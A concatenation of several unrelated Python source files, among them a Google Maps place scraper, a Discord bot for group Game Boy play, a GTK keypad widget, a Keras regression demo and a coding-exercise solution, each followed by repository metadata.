price = extract_price(price_element.text)
star_rating_element = WebDriverWait(driver, 5).until(EC.visibility_of_element_located(
(By.XPATH, '//div[@class="s35xed"]//li[@class="OyY9Kc" and contains(., "star hotel")]/span')))
if star_rating_element:
star_rating = star_rating_element.text or ""
text_elements = WebDriverWait(driver, 5).until(EC.presence_of_all_elements_located(
(By.XPATH, '//div[@class="HeZRrf"]//div[@class="P1LL5e"]')))
if text_elements:
all_text = ' '.join([element.text for element in text_elements])
except TimeoutException:
print("Timeout for ABOUT Page")
return (price, star_rating, all_text)
except Exception as e:
print("***********************ERROR*************************")
print("Error about data", e)
return (price, star_rating, all_text)
# traceback.print_exc()
return (price, star_rating, all_text)
def getBookingLink(htmlCode):
result = ""
element = htmlCode.xpath(
'//a[contains(@data-tooltip, "Open booking link")]')
if element and len(element) > 0:
valueStr = element[0].xpath('@href').extract_first('')
result = valueStr
return result
def getAddress(htmlCode):
result = ""
element = htmlCode.xpath(
'//button[contains(@data-tooltip, "Copy address")]')
if element and len(element) > 0:
valueStr = element[0].attrib.get('aria-label', '')
result = valueStr
return result
def getCategory(htmlCode):
result = ""
element = htmlCode.xpath(
'//button[contains(@jsaction, "pane.rating.category")]')
if element and len(element) > 0:
valueStr = element[0].xpath('string()').get()
result = valueStr
return result
def getPhotos():
result = []
try:
element = driver.find_element("xpath",
"//button[contains(@aria-label, 'All')]")
driver.execute_script("arguments[0].scrollIntoView();", element)
driver.execute_script("arguments[0].click();", element)
backButton = WebDriverWait(driver, 5).until(EC.visibility_of_element_located(
(By.XPATH, "//button[contains(@data-tooltip, 'Back')]")))
imgElements = driver.find_elements(
"xpath", "//a[starts-with(@data-photo-index, '')]/div[@role='img']")
numberOfElements = len(imgElements)
for i in range(numberOfElements):
imgEl = driver.find_element("xpath",
"//a[@data-photo-index='" + str(i) + "']/div[@role='img']")
driver.execute_script("arguments[0].scrollIntoView();", imgEl)
WebDriverWait(driver, 5).until(
lambda driver: 'https' in imgEl.get_attribute('style'))
style = imgEl.get_attribute('style')
url = style.split('"')[1]
result.append(url)
driver.execute_script("arguments[0].click();", backButton)
except TimeoutException:
print("Timeout for getPhotos")
except Exception as e:
print("***********************ERROR*************************")
print("Error getPhotos:")
return result
def getReviews():
result = {"this_year": [], "previous_years": []}
num_comments = 20
try:
scrollDownLeftMenuOnGoogleMaps(5)
element = WebDriverWait(driver, 5).until(EC.visibility_of_element_located(
(By.XPATH, "//button[contains(@jsaction, 'pane.reviewChart.moreReviews')]")))
if element:
driver.execute_script("arguments[0].click();", element)
WebDriverWait(driver, 5).until(EC.visibility_of_element_located(
(By.XPATH, "//div[contains(@jsaction, 'mouseover:pane.review.in; mouseout:pane.review.out')]")))
last_index_processed = 0
added_elements = 0
target_string = ""
while added_elements < num_comments:
try:
target_string += str(added_elements)
target_string = target_string[-5:]
samecounts = target_string.count(str(added_elements))
if samecounts >= 2:
break
commentElements = driver.find_elements(
By.XPATH,
"//div[contains(@jsaction, 'mouseover:pane.review.in; mouseout:pane.review.out')]/div[1]/div[4]")
for element in commentElements[last_index_processed:]:
driver.execute_script("arguments[0].scrollIntoView(true);", element)
last_index_processed += 1
if element not in result["this_year"] and element not in result["previous_years"]:
span_elements = element.find_elements(By.XPATH, './div[2]/div[1]/span')
if len(span_elements) == 2:
try:
span_elements[1].click()
except ElementNotInteractableException:
driver.execute_script("arguments[0].click();", span_elements[1])
if span_elements and len(span_elements) > 0:
text = span_elements[0].text
date_element = element.find_element(By.XPATH, './div[1]/span[2]')
date_str = date_element.text
if "year" in date_str:
result["previous_years"].append(text)
else:
result["this_year"].append(text)
added_elements += 1
time.sleep(2)
except StaleElementReferenceException:
print("Encountered StaleElementReferenceException in getReviews, retrying...")
continue
except TimeoutException:
print("Timeout for getReviews")
except Exception as e:
print("***********************ERROR*************************")
print("Error getReviews:", e)
return result
def getHours(htmlCode, page_content):
result = []
try:
element = htmlCode.xpath(
'//img[contains(@aria-label, "Hours")]/../../div[2]')
if element and len(element) > 0:
valueStr = element[0].xpath('@aria-label').extract_first('')
if valueStr:
weekdays = ['Monday', 'Tuesday', 'Wednesday',
'Thursday', 'Friday', 'Saturday', 'Sunday']
lines = valueStr.split(';')
for line in lines:
# Split the line into day and times
parts = line.split(',')
if len(parts) < 2:
continue
# Extract day and remove additional info in parentheses
day = parts[0].strip()
day = day.split(' ')[0] # New line to handle "Thursday (Pancasila Day)" case
times = parts[1].strip()
# Split the times into open time and close time
if "to" in times:
times = times.split(' to ')
if len(times) < 2:
continue
open_time = re.sub(r'[^a-zA-Z0-9 ]', ' ', times[0].strip())
close_time = re.sub(
r'[^a-zA-Z0-9 ]', ' ', times[1].strip())
# Create a dictionary and add it to the list
result.append({'day': day, 'open_time': open_time,
'close_time': close_time})
if "24" in times:
result.append({'day': day, 'open_time': "12:00 AM",
'close_time': "11:59 PM"})
# Sort the list by day of the week
result.sort(key=lambda x: weekdays.index(x['day']))
if not element and "Temporarily closed" in page_content:
result = []
except Exception as e:
print("***********************ERROR*************************")
print("Error get hours:", e)
return []
return result
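# e.g. an aria-label like "Monday, 9 AM to 5 PM; Tuesday, ..." yields
# [{'day': 'Monday', 'open_time': '9 AM', 'close_time': '5 PM'}, ...], sorted Monday-Sunday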
def getWebsite(htmlCode):
result = ""
element = htmlCode.xpath(
'//a[contains(@data-tooltip, "Open website")]')
if element and len(element) > 0:
valueStr = element[0].xpath('@href').extract_first('')
result = valueStr
return result
def getPlaceInfo(id):
# url = "https://www.google.com/maps/place/?hl=en&q=place_id:ChIJj3JXUTtD0i0RzUQZaHJndOs"
try:
url = "https://www.google.com/maps/place/?hl=en&q=place_id:" + id
# print(url)
driver.get(url)
page_content = driver.page_source
response = Selector(page_content)
# print("- GETTING PHONE")
phone = getPhone(response)
# print("- GET PRICE")
price = getPrice(response)
# print("- GETTING CATEGORY")
category = getCategory(response)
# print("- GETTING MENU")
menu = getMenu(response)
# print("- GETTING HOURS")
hours = getHours(response, page_content)
# print("- GETTING WEBSITE")
website = getWebsite(response)
# print("- GETTING CHECHOUT")
checkout = getCheckout(response)
# print("- GETTING ADDRESS")
address = getAddress(response)
# print("- GETTING BOOKING LINK")
bookingLink = getBookingLink(response)
# print("- GETTING PHOTOS")
photos = getPhotos()
# print("- GETTING REVIEWS")
# reviews = getReviews()
# print("- GETTING ABOUT DATA")
# aboutdata = getAboutData()
data = {
"url": url,
"phone": phone,
"category": category,
"menu": menu,
"hours": hours,
"website": website,
"checkout": checkout,
"address": address,
"bookingLink": bookingLink,
"photos": photos,
"price": price,
# "reviews": {"last_year": reviews["this_year"], "old": reviews["previous_years"]},
# "price": aboutdata[0],
# "hotel_stars": aboutdata[1],
# "description": aboutdata[2],
}
return data
except Exception as e:
print("***********************GET_INFO_ERROR*************************")
print(e)
# traceback.print_exc()
return None
index = 100000
step = 100300
currentStep = index
updatedData = []
problem_places_ids = []
def debug_error():
    data = []
    new_errors = []
    try:
        with open('data/[{}-{}]-error-places.json'.format(index, step)) as f:
            error_data = json.load(f)
        for r in error_data:
            print("****************PROCESSING_DEBUGER****************", r["place_id"])
            newData = getPlaceInfo(r["place_id"])
            if newData:
                merged_dict = {**newData, **r}
                # add to main file
                data.append(merged_dict)
                print("Data from google:", newData)
                # remove from errors-file
            else:
                new_errors.append(r)
                print("******************PLACE_NOT_ADDED_DEBUGER*************", r["place_id"])
    finally:
        with open('[{}-{}]-fixed-places.json'.format(index, step), 'w') as f:
            json.dump(data, f, indent=4)
        with open('[{}-{}]-error-places.json'.format(index, step), 'w') as f:
            json.dump(new_errors, f, indent=4)
        driver.quit()
def save_data():
with open('[{}-{}]-places.json'.format(index, currentStep), 'w') as f:
json.dump(updatedData, f, indent=4)
with open('[{}-{}]-error-places.json'.format(index, currentStep), 'w') as f:
        json.dump(problem_places_ids, f, indent=4)
atexit.register(save_data)
if __name__ == "__main__":
# debug_error()
# sys.exit()
    start_time = end_time = time.time()
    try:
with open('./data/not_closed_points.json') as f:
data = json.load(f)
arr = data[index:step]
start_time = time.time()
        for i, r in enumerate(arr):
            print(f"****************PROCESSING-{index + i}****************\n", r["name"])
            newData = getPlaceInfo(r["place_id"])
            if newData:
                merged_dict = {**newData, **r}
                updatedData.append(merged_dict)
                print("********************************\n")
            else:
                r["url"] = "https://www.google.com/maps/place/?hl=en&q=place_id:{}".format(r["place_id"])
                problem_places_ids.append(r)
                print("******************PLACE_NOT_ADDED*************:", r["name"])
            currentStep = index + i
end_time = time.time() # End time
except Exception as e:
print("****************MAIN_ERROR***************")
print(e)
# traceback.print_exc()
finally:
elapsed_time = end_time - start_time
print("\n\nElapsed time: ", elapsed_time, "seconds\n\n")
with open('[{}-{}]-places.json'.format(index, currentStep), 'w') as f:
json.dump(updatedData, f, indent=4)
with open('[{}-{}]-error-places.json'.format(index, currentStep), 'w') as f:
            json.dump(problem_places_ids, f, indent=4)
driver.quit()
# fix me is Price there always?
# get subname ChIJJ4sGOVE60i0RPoPmS8rrBWw
# photo from reviews?
# checkin
# about labels could be negative
# web results?
|
andyvauliln/Google-Maps-Scraper
|
scrap_place_info_from_googlemap_site.py
|
scrap_place_info_from_googlemap_site.py
|
py
| 18,017 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2578272371
|
def solution(rows, columns, queries):
answer = []
matrix = [[0] * columns for _ in range(rows)]
for i in range(rows):
for j in range(columns):
matrix[i][j] = i * columns + j + 1
for query in queries:
r1, c1, r2, c2 = query[0]-1, query[1]-1, query[2]-1, query[3]-1
stack = []
        # walk the border clockwise: top row, right column, bottom row, left column
        for k in range(c1, c2 + 1):
            stack.append(matrix[r1][k])
            if len(stack) == 1:
                continue
            matrix[r1][k] = stack[-2]
        for k in range(r1 + 1, r2 + 1):
            stack.append(matrix[k][c2])
            matrix[k][c2] = stack[-2]
        for k in range(c2 - 1, c1 - 1, -1):
            stack.append(matrix[r2][k])
            matrix[r2][k] = stack[-2]
        for k in range(r2 - 1, r1 - 1, -1):
            stack.append(matrix[k][c1])
            matrix[k][c1] = stack[-2]
answer.append(min(stack))
for i in matrix:
print(i)
return answer
print(solution(6,6,[[2,2,5,4]]))
# print(solution(6,6,[[2,2,5,4]]))
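# expected output: [8] (the minimum among the values moved along the rotated border)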
|
mayo516/Algorithm
|
주리머/2-3w/행렬 테두리 회전하기.py
|
행렬 테두리 회전하기.py
|
py
| 1,104 |
python
|
en
|
code
| null |
github-code
|
6
|
32341174856
|
'''
gamebot.py
Discord bot to let a discord server play gameboy games together. Put discord bot token into 'token.txt'
Requires:
- PILlow
- Discord.py
- PyBoy
Author: CPunch
'''
import io
import os
from pyboy import PyBoy, WindowEvent
from PIL import Image
import discord
import asyncio
from discord.ext import commands, tasks
from discord.ext.commands import Bot
from discord.ext.tasks import loop
ROMS = { # rom, default save, frames per request
# ================[[ POKEMON ]]================
"pkm_red":("roms/red.gb", "roms/red.sv", 120),
"pkm_blue":("roms/blue.gb", "roms/blue.sv", 120),
"pkm_yellow":("roms/yellow.gbc", "roms/yellow.sv", 120), # for nerds
"pkm_silver":("roms/silver.gbc", "roms/silver.sv", 120),
"pkm_gold":("roms/gold.gbc", "roms/gold.sv", 120),
# ================[[ DRAGON QUEST ]]================
"dragon_quest":("roms/quest.gbc", "roms/quest.sv", 120),
# ================[[ TETRIS ]]================
"tetris":("roms/tetris.gb", "roms/tetris.sv", 60),
# ================[[ FROGGER ]]================
"frogger":("roms/frogger.gbc", "roms/frogger.sv", 60),
# ================[[ Harvest Moon ]]================
"harvest_moon":("roms/harvest2.gbc", "roms/harvest2.sv", 150),
# ================[[ Dr Mario ]]================
"dr_mario":("roms/dr_mario.gb", "roms/dr_mario.sv", 60),
}
# generates the save state
for key in ROMS:
rom = ROMS[key]
print(rom[0])
vm = PyBoy(rom[0], window_type="headless")
for i in range(2000):
vm.tick()
vm.save_state(open(rom[1], "wb"))
GIF_SHOOT_MODULUS = 8 # every frame whose index is a multiple of this is added to the gif
SCALE = 3 # scale the images up in size before sending to discord
COMMAND_PREFIX = '!'
CLEAN_IDLE_GAMES = False # if a game doesn't have input for an hour, clean it up
EMOJI_REACTIONS = [
'⬆', # up arrow
'⬇', # down arrow
'⬅', # left arrow
'➡', # right arrow
'🅰', # a button
'🅱', # b button
'➖', # start
'➕', # select
'❌' # no input
]
REACTION_BUTTONS = [
(WindowEvent.PRESS_ARROW_UP, WindowEvent.RELEASE_ARROW_UP),
(WindowEvent.PRESS_ARROW_DOWN, WindowEvent.RELEASE_ARROW_DOWN),
(WindowEvent.PRESS_ARROW_LEFT, WindowEvent.RELEASE_ARROW_LEFT),
(WindowEvent.PRESS_ARROW_RIGHT, WindowEvent.RELEASE_ARROW_RIGHT),
(WindowEvent.PRESS_BUTTON_A, WindowEvent.RELEASE_BUTTON_A),
(WindowEvent.PRESS_BUTTON_B, WindowEvent.RELEASE_BUTTON_B),
(WindowEvent.PRESS_BUTTON_START, WindowEvent.RELEASE_BUTTON_START),
(WindowEvent.PRESS_BUTTON_SELECT, WindowEvent.RELEASE_BUTTON_SELECT),
(None, None)
] # corresponds with EMOJI_REACTIONS
WHITELISTED_USERS = [
168807635737378816
] # users that have permissions in all servers to run commands
WHITELISTED_CHANNELS = [
726144063845302411,
726512748103729183,
725884904147124355,
726181851705638963,
726356601065177158
] # channels that won't be cleaned up automatically
ACTIVE_CHANNELS = {}
# make sure the saves directory exists
if not os.path.exists("./saves"):
os.makedirs("./saves")
def activateChannel(id, rom):
# start our vm, this vm is exclusive to this channel ONLY
vm = PyBoy(ROMS[rom][0], window_type="headless", debug=False)
vm.set_emulation_speed(0) # don't delay for anything, just compute the instructions as fast as possible
vm.load_state(open(ROMS[rom][1], "rb"))
ACTIVE_CHANNELS[id] = {}
ACTIVE_CHANNELS[id]["active"] = True
ACTIVE_CHANNELS[id]["rom"] = rom
ACTIVE_CHANNELS[id]["vm"] = vm
ACTIVE_CHANNELS[id]["frames"] = ROMS[rom][2]
ACTIVE_CHANNELS[id]["state"] = io.BytesIO(open(ROMS[rom][1], "rb").read()) # copy default state
#ACTIVE_CHANNELS[id]["state"] = io.BytesIO()
ACTIVE_CHANNELS[id]["state"].seek(0)
def saveState(id):
with open("./saves/" + ACTIVE_CHANNELS[id]["rom"] + str(id), "wb") as outfile:
outfile.seek(0)
outfile.write(ACTIVE_CHANNELS[id]["state"].getvalue())
def getScreenCap(vm):
return vm.botsupport_manager().screen().screen_image().resize((160*SCALE, 144*SCALE), resample=Image.BOX)
# start our discord bot
client = Bot(description="Play GameBoy games with friends! :)", command_prefix=COMMAND_PREFIX, pm_help = False)
# call this every time a game is started or stopped
async def status_change():
await client.change_presence(activity=discord.Game(str(len(ACTIVE_CHANNELS)) + " gameboy games | !help"))
async def runGame(channel):
vm = ACTIVE_CHANNELS[channel.id]["vm"]
# all of these try, except are because discord.py loves to throw errors if things aren't *exactly* the way it expects it to be.
# we NEED to clean up the vm NO MATTER WHAT! otherwise, it'll never get cleaned up by python's garbage collector and we'll run out
# of memory. memory is precious, esp. on a raspberry pi with spotty internet connection so discord.py throws errors like it's at a rave.
try:
await status_change()
except:
ACTIVE_CHANNELS[channel.id]["active"] = False
try:
while ACTIVE_CHANNELS[channel.id]["active"]:
message = None
async with channel.typing(): # while we are loading the state & emulating 30 frames (1 second of gameplay)
frames = []
# press button down for 1/4 a second
if "prebutton" in ACTIVE_CHANNELS[channel.id] and ACTIVE_CHANNELS[channel.id]["prebutton"] != None:
vm.send_input(ACTIVE_CHANNELS[channel.id]["prebutton"])
for i in range(15):
vm.tick()
if i % GIF_SHOOT_MODULUS == 0: # add a screen capture to the frame queue
frames.append(getScreenCap(vm))
if "postbutton" in ACTIVE_CHANNELS[channel.id] and ACTIVE_CHANNELS[channel.id]["postbutton"] != None:
vm.send_input(ACTIVE_CHANNELS[channel.id]["postbutton"])
for i in range(ACTIVE_CHANNELS[channel.id]["frames"] - 15):
vm.tick()
if (i+15) % GIF_SHOOT_MODULUS == 0: # add a screen capture to the frame queue (we add 15 to match our previous frames)
frames.append(getScreenCap(vm))
ACTIVE_CHANNELS[channel.id]["state"].seek(0)
vm.save_state(ACTIVE_CHANNELS[channel.id]["state"])
ACTIVE_CHANNELS[channel.id]["state"].seek(0)
# final frame screenshot
frames.append(getScreenCap(vm))
# take the screenshot
tmpImage = io.BytesIO()
tmpImage.seek(0)
frames.insert(0, frames[len(frames)-1]) # set preview to the last frame
                frames[0].save(tmpImage, format='GIF', append_images=frames[1:], save_all=True, duration=(1000 * (ACTIVE_CHANNELS[channel.id]["frames"] / 60)) / (len(frames) - 1), optimize=True)
tmpImage.seek(0)
reactionTry = 5
while reactionTry > 0:
try:
# send screenshot to the channel
message = await channel.send(file=discord.File(tmpImage, filename="scrn.gif"))
# add reactions to message
for emoji in EMOJI_REACTIONS:
await message.add_reaction(emoji)
reactionTry = 0
except:
if message != None:
await message.delete()
reactionTry = reactionTry - 1
waited_log = 0
while ACTIVE_CHANNELS[channel.id]["active"]:
waited_log += 1
# if no activity for an hour, close session.
if CLEAN_IDLE_GAMES and channel.id not in WHITELISTED_CHANNELS and waited_log > 720:
ACTIVE_CHANNELS[channel.id]["active"] = False
saveState(channel.id)
await channel.send("> ⛔ game has been stopped due to inactivity. saved state!")
break
# wait for reactions
await asyncio.sleep(5)
message = await channel.fetch_message(message.id)
most_reacted = (None, 1)
for reaction in message.reactions:
if str(reaction) in EMOJI_REACTIONS: # is a valid reaction
if (most_reacted[1] < reaction.count):
most_reacted = (str(reaction), reaction.count)
else:
continue
if most_reacted[1] == 1: # no reactions, wait for 5 more seconds
continue
ACTIVE_CHANNELS[channel.id]["prebutton"] = REACTION_BUTTONS[EMOJI_REACTIONS.index(most_reacted[0])][0]
ACTIVE_CHANNELS[channel.id]["postbutton"] = REACTION_BUTTONS[EMOJI_REACTIONS.index(most_reacted[0])][1]
# quit reaction loop :)
                break
# deletes the message
await message.delete()
except:
saveState(channel.id)
try:
await channel.send("> ⛔ game crashed or forced shutdown! however state was saved, restore the save using load.")
ACTIVE_CHANNELS[channel.id]["active"] = False
except:
pass
try:
# we're no longer wanted!! kill it!
vm.stop(save=False) # we have our own saving implementation, saving states.
del ACTIVE_CHANNELS[channel.id]
await channel.send("> ✅ thanks for playing!")
await status_change()
except:
pass
@client.event
async def on_ready():
print(client.user.name + ' is ready!')
await status_change()
class ROMSTATE(commands.Cog, name='ROM running/loading/saving'):
"""Deals with loading/saving/running ROMs"""
@commands.command(pass_context = True, help="Starts the ROM, if ROM is omitted PKM_RED will be started", usage="(ROM)")
@commands.guild_only()
async def start(self, ctx, rom = "pkm_red"):
if ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS:
rom = rom.lower()
if not rom in ROMS:
await ctx.message.channel.send("> ⛔ game '" + rom + "' not found! use 'list' to get a list of roms.")
return
if ctx.message.channel.id in ACTIVE_CHANNELS:
await ctx.message.channel.send("> ⛔ game is already running in this channel! use 'stop' to stop the current game.")
return
await ctx.message.channel.send("> ✅ starting '" + rom.upper() + "'!")
activateChannel(ctx.message.channel.id, rom)
await runGame(ctx.message.channel)
@commands.command(pass_context = True, help="Stops the current ROM")
@commands.guild_only()
async def stop(self, ctx):
if (ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS) and ctx.message.channel.id in ACTIVE_CHANNELS:
ACTIVE_CHANNELS[ctx.message.channel.id]["active"] = False
@commands.command(pass_context = True, help="Force stops the current ROM. You *might* LOSE ALL PROGRESS.")
@commands.guild_only()
async def forcestop(self, ctx):
if (ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS) and ctx.message.channel.id in ACTIVE_CHANNELS:
ACTIVE_CHANNELS[ctx.message.channel.id]["vm"].stop(save=False)
del ACTIVE_CHANNELS[ctx.message.channel.id]
await status_change()
await ctx.message.channel.send("> ✅ force stoped successfully!")
@commands.command(pass_context = True, help="Saves the current state of the ROM to the channel")
@commands.guild_only()
async def save(self, ctx):
if (ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS) and ctx.message.channel.id in ACTIVE_CHANNELS:
saveState(ctx.message.channel.id)
await ctx.message.channel.send("> ✅ saved state successfully!")
@commands.command(pass_context = True, help="Loads ROM with saved state, if ROM is omitted PKM_RED will be used.", usage="(ROM)")
@commands.guild_only()
async def load(self, ctx, rom = "pkm_red"):
if ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS:
rom = rom.lower()
if not rom in ROMS:
await ctx.message.channel.send("> ⛔ game '" + rom + "' not found! use 'list' to get a list of ROMs.")
return
if ctx.message.channel.id in ACTIVE_CHANNELS:
await ctx.message.channel.send("> ⛔ cannot load state while game is running! use 'stop' to stop the current game.")
return
if os.path.exists("./saves/" + rom + str(ctx.message.channel.id)):
with open("./saves/" + rom + str(ctx.message.channel.id), "rb") as infile:
activateChannel(ctx.message.channel.id, rom)
# load file into state
await ctx.message.channel.send("> ✅ starting '" + rom.upper() + "'!")
ACTIVE_CHANNELS[ctx.message.channel.id]["vm"].load_state(infile)
await runGame(ctx.message.channel) # start game
else:
await ctx.message.channel.send("> ⛔ no state was saved!")
class REACTCONTROL(commands.Cog, name='Reaction button controls'):
"""Category for commands for buttons"""
@commands.command(pass_context = True, help="Lists controls")
@commands.guild_only()
async def controls(self, ctx):
strng = "`Here's a list of the controls:`\n"
for i in range(len(EMOJI_REACTIONS)):
strng += "> " + EMOJI_REACTIONS[i] + "\t"
if REACTION_BUTTONS[i][0] == WindowEvent.PRESS_ARROW_UP:
strng += "UP"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_ARROW_DOWN:
strng += "DOWN"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_ARROW_LEFT:
strng += "LEFT"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_ARROW_RIGHT:
strng += "RIGHT"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_BUTTON_A:
strng += "A BUTTON"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_BUTTON_B:
strng += "B BUTTON"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_BUTTON_START:
strng += "START"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_BUTTON_SELECT:
strng += "SELECT"
elif REACTION_BUTTONS[i][0] == None:
strng += "NO INPUT"
else:
strng += "ERR"
strng += "\n"
await ctx.message.channel.send(strng)
class MEMMANIP(commands.Cog, name='Gameboy Memory manipulation'):
"""Category for commands that allow you to manipulate memory in the gameboy"""
@commands.command(pass_context = True, help="Writes BYTE to ADDRESS in RAM", usage="[ADDRESS] [BYTE]")
@commands.guild_only()
async def write(self, ctx, addr, value):
addr = addr.replace("0x", "")
value = value.replace("0x", "")
if (ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS) and ctx.message.channel.id in ACTIVE_CHANNELS:
try:
ACTIVE_CHANNELS[ctx.message.channel.id]["vm"].set_memory_value(int(addr, 16), int(value, 16))
except:
await ctx.message.channel.send("> ⛔ failed to write to 0x" + addr + "!")
return
await ctx.message.channel.send("> ✅ wrote 0x" + value + " to 0x" + addr + " successfully!")
@commands.command(pass_context = True, help="Reads BYTE from ADDRESS in RAM", usage="[ADDRESS]")
@commands.guild_only()
async def read(self, ctx, addr):
addr = addr.replace("0x", "")
if (ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS) and ctx.message.channel.id in ACTIVE_CHANNELS:
try:
res = ACTIVE_CHANNELS[ctx.message.channel.id]["vm"].get_memory_value(int(addr, 16))
await ctx.message.channel.send("> 0x" + addr + " : " + str(hex(res)))
except:
await ctx.message.channel.send("> ⛔ failed to read " + addr)
return
@client.command(pass_context = True, name='list', help="Lists all available ROMs")
@commands.guild_only()
async def _list(ctx):
if ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS:
strng = "Here are a list of the avalible roms:```\n"
i = 0
for rom in ROMS:
i+=1
strng = strng + str(i) + ". " + rom.upper() + "\n"
strng += "```"
await ctx.message.channel.send(strng)
client.add_cog(ROMSTATE())
client.add_cog(MEMMANIP())
client.add_cog(REACTCONTROL())
client.run(open("token.txt", "r").readline())
|
CPunch/Gamebot
|
bot.py
|
bot.py
|
py
| 17,355 |
python
|
en
|
code
| 4 |
github-code
|
6
|
18849568621
|
# -*- coding: UTF-8 -*-
import gtk
import os
import pango
import gobject
MULT = 1
KB_COLS = 13
KB_ROWS = 1
buttons_ru = [ "ESC", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "BACKSP", "GO"]
class Numpad(gtk.Window):
def __init__(self):
super(Numpad, self).__init__()
self.flag = 0
self.text = ""
pangoFont = pango.FontDescription("Tahoma 24.2")
try:
gobject.signal_new("z_signal", self, gobject.SIGNAL_RUN_FIRST, gobject.TYPE_NONE, (gobject.TYPE_BOOLEAN, ))
except:
pass
self.set_decorated(False)
self.modify_font(pangoFont)
self.set_title("Set timeout")
self.tb = gtk.TextBuffer()
self.tb.set_text("Set timeout")
self.set_default_size(MULT*160, MULT*90)
self.tv = gtk.TextView(self.tb)
self.tv.modify_font(pangoFont)
self.tv.set_editable(False)
self.tv.set_border_width(3)
self.vbox = gtk.VBox()
self.vbox.add(self.tv)
self.hbox = {}
for i in range(KB_ROWS):
self.hbox[i] = gtk.HBox()
for j in range(KB_COLS):
self.button = gtk.Button(label = buttons_ru[i*KB_COLS+j])
self.button.connect("clicked", self.on_click, i*KB_COLS+j)
self.hbox[i].add(self.button)
self.vbox.add(self.hbox[i])
self.add(self.vbox)
self.set_position(gtk.WIN_POS_CENTER)
def on_click(self, e, prm):
if self.flag == 0:
self.tb.delete(self.tb.get_start_iter(), self.tb.get_end_iter())
if buttons_ru[prm] == "BACKSP":
start = self.tb.get_end_iter()
end = self.tb.get_end_iter()
start.backward_char()
self.tb.delete(start, end)
elif buttons_ru[prm] == "GO":
self.flag = 0
self.emit("z_signal", True)
elif buttons_ru[prm] == "ESC":
self.flag = 0
self.emit("z_signal", False)
else:
self.tb.insert(self.tb.get_end_iter(), buttons_ru[prm])
self.flag = 1
def get_text_to_find(self):
self.text = self.tb.get_text(self.tb.get_start_iter(), self.tb.get_end_iter())
try:
self.text = str(int(self.text))
except:
self.text = '120'
return self.text
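# --- usage sketch (not part of the original file) ---
# The window emits "z_signal" with True on GO and False on ESC; read the
# entered value with get_text_to_find().
if __name__ == '__main__':
    def on_z_signal(widget, accepted):
        if accepted:
            print(widget.get_text_to_find())
        gtk.main_quit()

    pad = Numpad()
    pad.connect("z_signal", on_z_signal)
    pad.show_all()
    gtk.main()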
|
Andvari/Wordscard
|
src/Numpad.py
|
Numpad.py
|
py
| 2,454 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8642734794
|
from typing import (
Protocol,
Type,
runtime_checkable,
)
@runtime_checkable
class ClientProtocol(Protocol):
async def connect(self):
...
async def disconnect(self):
...
def is_client(cls: Type[ClientProtocol]) -> bool:
try:
return issubclass(cls, ClientProtocol)
except TypeError:
return False
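# --- usage sketch (not part of the original file) ---
# ClientProtocol is structural: any class with async connect()/disconnect()
# methods satisfies it, no inheritance needed.
if __name__ == '__main__':
    class DummyClient:
        async def connect(self):
            pass

        async def disconnect(self):
            pass

    assert is_client(DummyClient)
    assert not is_client(int)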
|
avito-tech/trainspotting
|
trainspotting/clients.py
|
clients.py
|
py
| 360 |
python
|
en
|
code
| 5 |
github-code
|
6
|
30545228636
|
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
import matplotlib.pyplot as plt
np.random.seed(1337)
# create some data
X = np.linspace(-1,1,200)
np.random.shuffle(X)
Y = 0.5 * X + np.random.normal(0,0.1,(200,))
# plot data
plt.scatter(X,Y)
plt.show()
X_train, Y_train = X[:160],Y[:160] # first 160 data points for training
X_test, Y_test = X[160:],Y[160:] # last 40 data points for testing
# build the model
model = Sequential()
model.add(Dense(units=1, input_dim=1))
# activate the model
model.compile(loss = 'mse',optimizer='sgd') # loss function (mse: mean squared error) and optimizer (sgd: stochastic gradient descent)
# train the model
print('Training...')
for step in range(301):
cost = model.train_on_batch(X_train,Y_train)
if step % 100 == 0:
print('train cost:',cost)
# Test the model
print('Testing...')
cost = model.evaluate(X_test,Y_test,batch_size=40)
print('test cost:',cost)
W,b = model.layers[0].get_weights()
print('Weights=',W,' biases=',b)
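# --- added sketch (not in the original script): visualize the learned fit ---
Y_pred = model.predict(X_test)
plt.scatter(X_test, Y_test)
plt.plot(X_test, Y_pred, 'r-')
plt.show()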
|
limingwu8/ML
|
regression/regression.py
|
regression.py
|
py
| 1,009 |
python
|
en
|
code
| 1 |
github-code
|
6
|
1492499597
|
import pymysql
from pymysql import connect
# from baiyu.function.zudai_to_fumudai import *
from baiyu.models import *
import datetime
class OpenDB(object):
def __init__(self):
        # initialize the DB connection
self.conn = connect(host='localhost', port=3306, user='root', password='123456', database='forecastsystem', charset='utf8')
self.cursor = self.conn.cursor()
def __enter__(self):
        # return the cursor so statements can be executed
return self.cursor
def __exit__(self, exc_type, exc_val, exc_tb):
        # commit pending data and close the connection on exit
self.conn.commit()
self.cursor.close()
self.conn.close()
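# --- usage sketch (not part of the original file) ---
# OpenDB is a context manager: it yields a cursor, then commits and closes on exit, e.g.
#   with OpenDB() as cursor:
#       cursor.execute('SELECT 1')
#       print(cursor.fetchone())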
'''
# Get all weekly grandparent-stock introduction detail records; return type: list
# by sujie 2019/05/27
'''
def get_introduced_detail_all():
res = []
try:
db_res = IntroducedInfoDetail.objects.all()
for index in db_res:
res.append(index)
except Exception as e:
res = []
print(e)
return res
def get_introduced_detail_info(bird_type,nGen):
introduce_res = []
with OpenDB() as cursor:
sql = '''
SELECT
bi.id,
bi.YEAR,
bi.WeekNum,
bi.startDate,
bi.endDate,
bc.companyName,
bs.SpeciesName,
